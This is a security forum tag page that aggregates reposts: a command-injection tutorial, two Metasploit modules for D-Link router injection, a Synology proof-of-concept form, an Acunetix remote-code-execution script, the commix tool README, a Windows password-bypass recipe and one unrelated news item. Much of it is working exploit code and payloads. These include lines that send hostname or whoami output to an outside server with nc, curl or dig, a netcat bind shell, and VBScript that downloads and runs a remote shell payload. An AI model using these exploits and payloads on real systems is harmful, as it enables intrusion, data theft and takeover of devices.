Search the Community
Showing results for tags 'command'.
-
A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats. Before diving into command injections, let’s get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it’s an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key difference is in how you find and exploit them. Setting up Let’s start by writing two simple Ruby scripts that you can run locally to learn finding and exploiting command injection vulnerabilities. I used Ruby 2.3.3p222. Below is ping.rb. puts `ping -c 4 #{ARGV[0]}` This script will ping the server that’s being passed to the script as argument. It will then return the command output on the screen. Example output below. $ ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms As you can see, it executed ping -c 4 8.8.8.8 and displayed the output on the screen. Here’s another script that will be used in the blog post: server-online.rb. puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no' This script will determine whether the server is online based on an ICMP response (ping). If it responds to the ping request, it’ll display yes on the screen. In case it doesn’t, it’ll display no. The output of the command isn’t returned to the user. Example output below. $ ruby server-on.rb '8.8.8.8' yes $ ruby server-on.rb '8.8.8.7' no Testing One of the best ways to detect a first-order command injection vulnerability is trying to execute a sleep command and determine if the execution time increases. To start with this, let’s establish a time baseline for the ping.rb script: $ time ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.09s user 0.04s system 4% cpu 3.176 total Notice that executing script takes about 3 seconds. Now let’s determine if the script is vulnerable to a command injection by injecting a sleep command. $ time ruby ping.rb '8.8.8.8 && sleep 5' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.10s user 0.04s system 1% cpu 8.182 total The script will now execute the command ping -c 4 8.8.8.8 && sleep 5. Notice the execution time again: it jumped from ~3 seconds to ~8 seconds, which is an increase of exactly 5 seconds. There can still be unexpected delays on the internet, so it’s important to repeat the injection and play with the amount of seconds to make sure it’s not a false positive. Let’s determine whether the server-online.rb script is vulnerable, too. $ time ruby server-online.rb '8.8.8.8' yes 0.10s user 0.04s system 4% cpu 3.174 total $ time ruby server-online.rb '8.8.8.8 && sleep 5' yes 0.10s user 0.04s system 1% cpu 8.203 total Again, the baseline shows executing a normal request takes about 3 seconds. Adding && sleep 5 to the command increases the time to 8 seconds. Depending on the command being executed, the sleep command may be injected differently. Here are a few payloads that you can try when looking for command injections (they all work): time ruby ping.rb '8.8.8.8`sleep 5`' When a command line gets parsed, everything between backticks is executed first. Executing echo `ls` will first execute ls and capture its output. It’ll then pass the output to echo, which displays the output of ls on the screen. This is called command substitution. Since execution of the command between backticks takes precedence, it doesn’t matter if the command executed afterwards fails. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8`sleep 5` sleep command executed, command substitution works in command line. ping -c 4 "8.8.8.8`sleep 5`" sleep command executed, command substitution works in complex strings (between double quotes). ping -c 4 $(echo 8.8.8.8`sleep 5`) sleep command executed, command substitution works in command substitution when using a different notation (see example below). ping -c 4 '8.8.8.8`sleep 5`' sleep command not executed, command substitution does not work in simple strings (between single quotes). ping -c 4 `echo 8.8.8.8`sleep 5`` sleep command not executed, command substitution does not work when using the same notation. time ruby ping.rb '8.8.8.8$(sleep 5)' This is a different notation for command substitution. This may be useful when backticks are filtered or encoded. When using command substitution to look for command injections, make sure to test both notations to avoid true-negatives in case the payload is already being substituted (see last example in table above). time ruby ping.rb '8.8.8.8; sleep 5' Commands are executed in a sequence (left to right) and they can be separated with semicolons. When a command in the sequence fails it won’t stop executing the other commands. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8;sleep 5 sleep command executed, sequencing commands works when used on the command line. ping -c 4 "8.8.8.8;sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8;sleep 5) sleep command executed, sequencing commands works in command substitution. ping -c 4 '8.8.8.8;sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8;sleep 5` sleep command executed, sequencing commands works in command substitution. time ruby ping.rb '8.8.8.8 | sleep 5' Command output can be piped, in sequence, to another commands. When executing cat /etc/passwd | grep root, it’ll capture the output of the cat /etc/passwd command and pass it to grep root, which will then show the lines that match root. When the first command fail, it’ll still execute the second command. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8 | sleep 5 sleep command executed, piping output works when used on the command line. ping -c 4 "8.8.8.8 | sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8 | sleep 5) sleep command executed, piping output works in command substitution. ping -c 4 '8.8.8.8 | sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8 | sleep 5` sleep command executed, piping output works in command substitution. Exploiting To exploit the vulnerability for evidence is to determine whether it’s a generic or blind command injection. The difference between the two, is that a blind command injection doesn’t return the output of the command in the response. A generic command injection would return the output of the executes command(s) in the response. The sleep command is often a good proof of concept for either flavor. However, if you need more proof, execute id, hostname, or whoami and use the output as additional proof. The server’s hostname is useful to determine how many servers are affected and help the vendor to get a sense of impact faster. Important: needless to say, most companies don’t appreciate you snooping around on their systems. Before exploiting the vulnerability to pivot into something else, ask permission to the company. In nearly all situations proving that executing arbitrary but harmless commands like sleep, id, hostname or whoami is enough to proof impact to the affected company. Exploiting generic command injection This is usually pretty straightforward: the output of any injected command will be returned to the user: $ ruby ping.rb '8.8.8.8 && whoami' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.008 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=8.572 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=9.309 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=9.005 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.572/8.973/9.309/0.263 ms jobert The red part shows the output of the ping command. The green text the output of the whoami command. From this point, you can gather evidence for your proof of concept. Again, stick to harmless commands. Exploiting blind command injection With blind command injections the output isn’t returned to the user, so we should find other ways to extract the output. The most straightforward technique is to offload the output to your server. To simulate this, run nc -l -n -vv -p 80 -k on your server and allow inbound connections on port 80 in your firewall. Once you’ve set up the listener, use nc, curl, wget, telnet, or any other tool that sends data to the internet, to send the output to your server: $ ruby server-online.rb '8.8.8.8 && hostname | nc IP 80' yes Then observe a connection being made to your server that shows the output of the hostname command: $ nc -l -n -vv -p 80 -k Listening on [0.0.0.0] (family 0, port 81) Connection from [1.2.3.4] port 80 [tcp/*] accepted (family 2, sport 64225) hacker.local In the example above, nc is used to send the output of the command to your server. However, nc might be deleted or unable to execute. To avoid going down a rabbit hole, there are a few simple payloads to determine if a command exists. In case any of the commands increase the time with 5 seconds, you know the command exists. curl -h && sleep 5 wget -h && sleep 5 ssh -V && sleep 5 telnet && sleep 5 When you’ve determined a command exists, you can use any of those commands to send the output of a command to your server, like this: whoami | curl http://your-server -d @- wget http://your-server/$(whoami) export C=whoami | ssh user@your-server (setup the user account on your-server to authenticate without a password and log every command being executed) Even though the server-online.rb script doesn’t output the result of the hostname command, the output can be sent to a remote server and obtained by an attacker. In some cases, outbound TCP and UDP connections are blocked. It’s still possible to extract the output in that case, we just have to do a little bit more work. In order to extract the output, we have to guess the output based on something that we can change. In this case, the execution time can be increased using the sleep command. This can be used to extract the output. The trick here is to pass the result of a command to the sleep command. Here’s an example: sleep $(hostname | cut -c 1 | tr a 5). Let’s analyze this for a moment. It’s executing the hostname command. Let’s assume it returns hacker.local. It’ll take that output and pass it to cut -c 1. This will take the first character of hacker.local, which is the character h. It passes it to tr a 5, which will replace the character a with a 5 in the output of the cut command (h). The output of the tr command is then passed to the sleep command, resulting in sleep h being executed. This will immediately error, since sleep can only take a number as first argument. The goal is then to iterate over the characters with the tr command. Once you execute sleep $(hostname | cut -c 1 | tr h 5), the command will take 5 seconds longer to execute. This is how you determine that the first character is an h. Once you guessed a character, increase the number you pass to the cut -c command, and repeat. Here’s a table with the commands to determine the output: Command Time Result ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr h 5)' 8s h ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 2 | tr a 5)' 8s a ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr c 5)' 8s c To determine how many characters you need to guess: pipe the output of hostname to wc -c and pass that to the sleep command. hacker.local is 12 characters. The hostname command returns the hostname and a new line, so wc -c will return 13. We established that normally, the script takes 3 seconds to complete. $ time ruby server-online.rb '8.8.8.8 && sleep $(hostname | wc -c)' yes 0.10s user 0.04s system 0% cpu 16.188 total The payload above shows that the script now takes 16 seconds to complete, which means the output of hostname is 12 characters: 16 - 3 (baseline) - 1 (new line) = 12 characters. When executing this payload on a web server, know that the output may change: the length of the hostname could change when requests are handled by different servers. The technique above works fine for smaller outputs, but can take a long time for reading a file. Some of the following methods can be pretty intrusive, so always make sure the company gave you a thumbs up to use more invasive extraction methods. In case outbound connections are blocked and the output is too long to read, here are a few other tricks to try (useful during CTFs): Run a port scan on the server and based on the exposed services, determine a way to extract the output. FTP: try writing the file to a directory you can download files from. SSH: try writing the output of the command to the MOTD banner, then simply SSH to the server. Web: try writing the output of the command to a file in a public directory (/var/www/). Spawn a shell on a port that can be reached from the outside (only available in custom netcat build): nc -l -n -vv -p 80 -e /bin/bash (unix) or nc -l -n -vv -p 80 -e cmd.exe (windows). Do a DNS query with dig or nslookup to send the output to port 53 (UDP): dig `hostname` @your-server or nslookup `hostname` your-server. Output can be captured with nc -l -n -vv -p 53 -u -k on your server. This may work because outbound DNS traffic is often allowed. Check out this tweet how to offload file contents with dig. Change the ICMP packet size when pinging your server to offload data. tcpdump can be used to capture the data. Check out this tweet how to do this. There’s plenty of other ways, but it often depends on what kind of options the servers gives you. The technique shown above are most common when exploiting command injection vulnerabilities. The key is to use what you have to extract the output! Defeating mitigations Sometimes mitigations have been put in place, which may cause the above techniques not to work. One of the mitigations that I’ve seen over the years, is a restriction on whitespace in the payload. Luckily, there’s something called Brace Expansion that can be used to create payloads without whitespace. Below is ping-2.rb, which is the second version of ping.rb. Before passing the user input to the command, it removes whitespace from the input. puts `ping -c 4 #{ARGV[0].gsub(/\s+?/,'')}` When passing 8.8.8.8 && sleep 5 as argument, it’d execute ping -c 4 8.8.8.8&&sleep5, which will result in an error showing that the command sleep5 isn’t found. There’s an easy workaround by using brace expansion: $ time ruby ping-2.rb '8.8.8.8;{sleep,5}' ... 0.10s user 0.04s system 1% cpu 8.182 total Here’s a payload that sends the output of a command to an external server without using whitespace: $ ruby ping.rb '8.8.8.8;hostname|{nc,192.241.233.143,81}' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... Or to read /etc/passwd: $ ruby ping.rb '8.8.8.8;{cat,/etc/passwd}' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.215 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=10.194 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=10.171 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=8.615 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.615/9.549/10.194/0.668 ms ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. ... Whenever a command is being executed with user input mitigations have to be put in place by the developer. Developers take different routes to implement mitigations, so it’s up to you to discover what they did and how to work around them. Happy hacking! Jobert. Source :
-
America takes photobombing REALLY seriously Medieval butcher bastards ISIS are adept at using the web to lure Western followers to their warped cause – but the internet can turn around and bite back. Air Force General Hawk Carlisle, head of US Air Combat Command, told a conference that analysts at the 361st Intelligence, Surveillance and Reconnaissance Group spotted a selfie snapped and posted online by an ISIS fighter standing outside a command-and-control building in the Mid East. "The [airmen are] combing through social media and they see some moron standing at this command," Carlisle said at the speech, Air Force Times reports. "And in some social media, open forum, bragging about command and control capabilities for Da'esh. And these guys go 'ah, we got an in.'" According to the general, the analysts worked out the position of the building based on the information posted online, and 22 hours later the Air Force paid a visit, dropping three Joint Direct Attack Munitions (JDAM) – dumb iron bombs fitted with fins and a guidance package for precision strikes – on the building, destroying it. "Through social media. It was a post on social media. Bombs on target in 22 hours," Carlisle said. "It was incredible work, and incredible airmen doing this sort of thing." On Wednesday, US Congress's House Homeland Security Committee heard that ISIS is flooding social networking websites with propaganda, reaching thousands of potential recruits to their evil cause. At those briefings, Michael Steinbach, assistant director in the FBI's Counterterrorism Division, claimed Apple and Google's use of encryption was helping ISIS by hiding their communications from view. Based on this latest case, ISIS is doing a pretty good job of making it easy for Uncle Sam to spot them. Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
------------------------------------------------------------------------ Command injection vulnerability in Synology Photo Station ------------------------------------------------------------------------ Han Sahin, May 2015 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was tested on Synology Photo Station version 6.2-2858. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html Proof of concept The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt. <html> <body> <form action="http://<target>/photo/webapi/photo.php" method="POST"> <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" /> <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " /> <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" /> <input type="hidden" name="method" value="edit" /> <input type="hidden" name="version" value="1" /> <input type="hidden" name="ps_username" value="admin" /> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
-
1) Boot from the Windows Server 2012 ISO 2) At Windows Setup menu, click Next 3) Chose Repair your computer 4) On Choose and option click Troubleshoot 5) Under Advanced options click Command Prompt Now on command prompt, run commands: d: cd windows\system32 ren Utilman.exe Utilman.exe.old copy cmd.exe Utilman.exe 6) Close command prompt and click “Continue”. 7) Server will now boot and present the logon screen. Here press Windows Key + U 8) In prompt you can now change the password typing the command: net user administrator Password This will set the password for Administrator to Password (case sensitive) Close CMD and you should be able to log back onto the server using the password you have provided in the last step. Author: razvan1@hy
-
__ ___ ___ ___ ___ ___ ___ /\_\ __ _ /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </ \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ \/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b } +-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright © 2015 Anastasios Stasinopoulos (@ancst) +-- General Information Commix (short for [comm]and njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language. Disclaimer The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!! Requirements Python version 2.6.x or 2.7.x is required for running this program. Installation Download commix by cloning the Git repository: git clone https://github.com/stasinopoulos/commix.git commix Usage Usage: python commix.py [options] Options -h, --help Show help and exit. --verbose Enable the verbose mode. --install Install 'commix' to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit. Target This options has to be provided, to define the target URL. --url=URL Target URL. --url-reload Reload target URL after command execution. Request These options can be used, to specify how to connect to the target URL. --host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --cookie=COOKIE HTTP Cookie header. --headers=HEADERS Extra headers (e.g. 'Header1:Value1\nHeader2:Value2'). --proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080'). --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-cred=AUTH.. HTTP Basic Authentication credentials (e.g. 'admin:admin'). Injection These options can be used, to specify which parameters to inject and to provide custom injection payloads. --data=DATA POST data to inject (use 'INJECT_HERE' tag). --suffix=SUFFIX Injection payload suffix string. --prefix=PREFIX Injection payload prefix string. --technique=TECH Specify a certain injection technique : 'classic', 'eval-based', 'time-based' or 'file-based'. --maxlen=MAXLEN The length of the output on time-based technique (Default: 10000 chars). --delay=DELAY Set Time-delay for time-based and file-based techniques (Default: 1 sec). --base64 Use Base64 (enc)/(de)code trick to prevent false- positive results. --tmp-path=TMP_P.. Set remote absolute path of temporary files directory. --icmp-exfil=IP_.. Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3'). --alter-shell Use an alternative os-shell (Python). Usage Examples Exploiting Damn Vulnerable Web App python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4" Exploiting php-Charts 1.0 using injection payload suffix & prefix string: python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" Exploiting OWASP Mutillidae using Extra headers and HTTP proxy: python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081" Exploiting Persistence using ICMP exfiltration technique : su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5 Sursa: https://github.com/stasinopoulos/commix
-
- all-in-one
- automated
-
(and 5 more)
Tagged with:
-
#!/usr/bin/python import BaseHTTPServer, sys, socket ## # Acunetix OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7 # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record # Target Login Sequence # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/ # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # And Finally You Can Connect To Victim Machine Using Netcat # Usage: # chmod +x acunetix.py # ./acunetix.py # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix # nc 192.168.1.7 333 # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe # # Video: https://vid.me/SRCb ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/acunetix.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("acunetix.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\ 'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close() Source
-
Citrix NITRO SDK Command Injection ------------------------------------------------------------------------ Command injection vulnerability in Citrix NITRO SDK xen_hotfix page ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.html This vulberability exists because the file_name parameter submitted to the 